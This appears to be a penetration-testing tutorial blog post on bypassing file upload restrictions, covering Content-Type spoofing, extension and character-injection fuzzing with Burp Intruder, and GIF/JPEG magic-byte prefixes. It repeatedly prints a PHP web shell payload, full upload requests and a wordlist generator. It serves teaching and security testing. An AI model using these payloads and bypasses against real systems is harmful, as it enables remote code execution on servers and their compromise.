What is a File Upload Vulnerability?
A file upload vulnerability is a security issue in a web application that allows an attacker to upload a malicious file and then get it executed or served by the server.
It occurs when the application does not properly validate or restrict the files being uploaded (by type, extension, content and storage location), allowing the attacker to bypass the intended security measures and potentially compromise the system.
There are many ways to bypass file upload restrictions, depending on which defenses are in place. In this post, I'll show you the common bypasses, including one of my favorites.
Content-Type Restriction Bypass
1. Create a malicious .php file:
<?php echo system($_GET['cmd']); ?>
2. Try to upload the file, and you will get a message saying "Extension Not Allowed" or something similar.
3. Using a tool like Burp Suite, capture the request and change the Content-Type of the file part:
Content-Type: image/png
4. In the above example we used png, but change it to whatever type the application allows. For example, if it only allows JPEG images, use the registered MIME type:
Content-Type: image/jpeg
Some applications also accept the non-standard image/jpg, so try both. This bypass only works when the server trusts the Content-Type header the client sends; the file itself is still PHP.
Bypass 2:
If you do not know which Content-Type the server accepts, or none of the obvious ones work, you can fuzz for it:
1. Send the request to Burp Intruder and mark the value of Content-Type as the payload position:
Content-Type: §image/jpg§
2. Use the content-type wordlist from SecLists:
SecLists - content-type.txt
3. Once the attack is done, sort the results by Length, Status Code, or Response Time. Compare each response against the baseline "not allowed" response and find the Content-Type payload that worked.
Extension Bypass
1. Create a malicious .php file:
<?php echo system($_GET['cmd']); ?>
2. Try to upload the file, and you get an error message saying you cannot upload a .php file, even after you change the Content-Type. In this case the server is checking the extension, so we fuzz for alternative extensions that get past the blacklist. Let's start with a simple one. Send the request to Burp Intruder and mark only the extension as the payload position:
Content-Disposition: form-data; name="uploadFile"; filename="myFile§.php§"
Content-Type: text/asp

<?php system($_REQUEST['cmd']); ?>
3. With the extension marked as the attack position, we use a publicly available extension wordlist, for example:
PayloadsAllTheThings - extensions.lst
4. Load the payloads from step 3 under the Payloads tab and start the attack. Once the attack is done, sort by Length, Status Code, or Response Time, analyze the requests, and find the extension that was accepted. Whether an accepted extension (for example .phtml or .phar) is actually executed as PHP depends on the web server's handler configuration, so confirm by requesting the uploaded file afterwards.
Bypass 2:
If the above payloads did not work for you, there is another way of bypassing the extension restrictions.
1. We can use "character injection": inject certain characters before or after the extension so that the check sees an allowed extension (.jpg) while the server still stores or executes the file as a .php script. The following bash loop builds a wordlist of such names:
# Combine each injection character with each PHP-executable extension,
# placing the pair before and after the allowed .jpg extension.
# "…" is the single Unicode ellipsis character, not three dots.
: > wordlist.txt
for char in "%20" "%0a" "%00" "%0d0a" "/" ".\\" "." "…" ":"; do
for ext in ".php" ".phps" ".php3" ".pht" ".phar" ".phpt" ".pgif" ".phtml" ".phtm"; do
echo "myFile${char}${ext}.jpg" >> wordlist.txt
echo "myFile${ext}${char}.jpg" >> wordlist.txt
echo "myFile.jpg${char}${ext}" >> wordlist.txt
echo "myFile.jpg${ext}${char}" >> wordlist.txt
done
done
2. The nested loop pairs every injection character (char) with every PHP extension (ext) in four positions: before or after the PHP extension, with the allowed .jpg extension either first or last. Each resulting filename is appended to wordlist.txt. The %00 entries test null-byte truncation of the stored name, the %20/%0a/%0d0a entries test whitespace and newline handling, and the double-extension entries test checks that only look at the last (or first) extension.
3. Run the above code in your terminal, and it will create a file called wordlist.txt with a few hundred payloads that we are going to use next.
4. Again, in the same scenario, we try to upload our malicious .php script and get a message saying "extension not allowed" or something similar. Send the request to Burp Intruder, mark the whole filename as the payload position, and load wordlist.txt as the payload list:
Content-Disposition: form-data; name="uploadFile"; filename="§myFile.php§"
Content-Type: text/asp

<?php system($_REQUEST['cmd']); ?>
5. Once the attack is done, sort by Length, Status Code, or Response Time. Analyze the requests, find the filename that worked, and request the uploaded file to confirm the code actually executes.
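As an added example (not code from the original post), the wordlist generator above is reproduced in Python and each candidate is scored against a constructed model of a weak extension check, so you can see why each kind of entry is in the list. weak_ext_check, stored_name and would_run_as_php are assumed server behaviours (a denylist applied to the last extension of the raw name, null-byte truncation of the stored name, and Apache-style multi-extension handler matching); they are illustrations, not a description of any particular product.

```python
"""Character-injection wordlist (the post's bash loop, in Python) scored against a
constructed model of a weak extension check.

Added example, not code from the original post. CHARS and EXTS mirror the shell
loop above. weak_ext_check(), stored_name() and would_run_as_php() are assumed
server behaviours chosen to show why each candidate is in the list, not a
description of any specific product.
"""
from urllib.parse import unquote

CHARS = ["%20", "%0a", "%00", "%0d0a", "/", ".\\", ".", "\u2026", ":"]  # \u2026 is the ellipsis
EXTS = [".php", ".phps", ".php3", ".pht", ".phar", ".phpt", ".pgif", ".phtml", ".phtm"]
PHP_EXTS = {e.lstrip(".") for e in EXTS}
BLACKLIST = {".php", ".phtml", ".php3"}  # constructed: an incomplete denylist


def character_injection_wordlist(base="myFile", image_ext=".jpg", chars=CHARS, exts=EXTS):
    """Same four placements as the bash loop; duplicates removed, order kept."""
    names = []
    for char in chars:
        for ext in exts:
            names += [
                f"{base}{char}{ext}{image_ext}",
                f"{base}{ext}{char}{image_ext}",
                f"{base}{image_ext}{char}{ext}",
                f"{base}{image_ext}{ext}{char}",
            ]
    return list(dict.fromkeys(names))


def weak_ext_check(filename, blacklist=BLACKLIST):
    """Assumed weak check: look only at the text after the LAST dot of the raw name."""
    _, _, ext = filename.rpartition(".")
    return ("." + ext.lower()) not in blacklist


def stored_name(filename):
    """Assumed legacy handling of the stored path: percent-decode, then a NUL byte
    ends the string (classic null-byte truncation in C-backed file APIs)."""
    return unquote(filename).split("\x00", 1)[0]


def would_run_as_php(stored):
    """Assumption modelled on Apache's multi-extension matching (AddHandler ... .php):
    any dot-separated segment after the base name that is a PHP extension runs as PHP."""
    return any(seg.lower() in PHP_EXTS for seg in stored.split(".")[1:])


def candidates_that_pass(wordlist=None):
    """Names that get past the weak check AND would still execute as PHP once stored."""
    wordlist = wordlist if wordlist is not None else character_injection_wordlist()
    return [n for n in wordlist
            if weak_ext_check(n) and would_run_as_php(stored_name(n))]


if __name__ == "__main__":
    for name in candidates_that_pass():
        print(name)
```

Entries such as myFile.php%00.jpg survive because the check sees .jpg but the stored name is cut at the NUL; myFile.jpg%00.php fails the same check because its last extension is .php. Against a real target you do not know which of these behaviours is present, which is exactly why the whole wordlist goes into Intruder rather than a hand-picked entry.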
Advanced level Bypass
Content Restriction & Extension Bypass:
1. Now let's say you tried to bypass the Content-Type and the extension check, but you still get a message saying "Only Images are allowed" or something similar. That means the server is probably inspecting the contents of the file as well (for example with a magic-byte check, or by trying to read it as an image). In that case, we can try to trick the server into thinking our file is an image.
Content-Disposition: form-data; name="uploadFile"; filename="myFile.php"
Content-Type: image/gif
GIF8
<?php system($_REQUEST['cmd']); ?>
2. In the above request we put GIF8 at the very start of the file. A real GIF starts with the signature GIF87a or GIF89a, and many content checks only compare the first few bytes, so the file looks like a GIF to the check while our PHP script follows right after the signature.
3. That bypasses the content check; all that is left is the extension restriction, which we fuzz by marking the filename as the position and using the wordlist.txt file we created earlier.
Magic Byte:
1. This time we cannot bypass the content check with "GIF8" because, let's say, the server only accepts jpg and png. In that case we take advantage of the file's "magic bytes".
The term "magic bytes" refers to the first few bytes of a file, which identify its format. They are also called a "file signature" or "magic number". Most binary formats begin with a fixed byte sequence, usually written in hexadecimal, and file parsers, operating systems and libraries such as libmagic (behind the file command) use it to decide how to treat a file regardless of its extension or metadata, which may be altered or misleading.
For example, a JPEG file in the common JFIF form starts with FF D8 FF E0 00 10 4A 46 49 46 00 01: FF D8 is the start-of-image marker, FF E0 the APP0 segment, and 4A 46 49 46 00 is the string "JFIF". Every JPEG starts with FF D8 FF, but the fourth byte differs between variants (FF E1 for Exif files produced by cameras). PNG files start with 89 50 4E 47 0D 0A 1A 0A and GIF files with GIF87a or GIF89a.
By examining the magic bytes, a server can tell whether an upload is an image, an audio file, an executable, and so on, but only as far as the bytes it inspects: a file that begins with a valid signature and continues with a PHP script passes a prefix check.

2. In the above image we used the xxd tool to view a .jpg file in hex, and the file begins with FF D8 FF E0 00 10 4A 46 49 46 00 01. Every JFIF-format .jpg starts this way; every JPEG of any variant shares at least the first three bytes, FF D8 FF.
3. Now we create a file with a .txt extension that contains only the JPEG magic bytes (for example by writing the bytes FF D8 FF E0 with printf and redirecting them into the file):

4. The file has a .txt extension, but when we check its type with the file utility it is reported as JPEG image data.
5. So now we can upload this file, because the backend's content check sees a .jpg. All that is left is to add our malicious script after the magic bytes and fuzz the filename with the wordlist.txt payloads we created earlier. In Burp the four bytes FF D8 FF E0 are displayed as ÿØÿà:
Content-Disposition: form-data; name="uploadFile"; filename="§myFile.txt§"
Content-Type: image/jpg

ÿØÿà
<?php system($_REQUEST['cmd']); ?>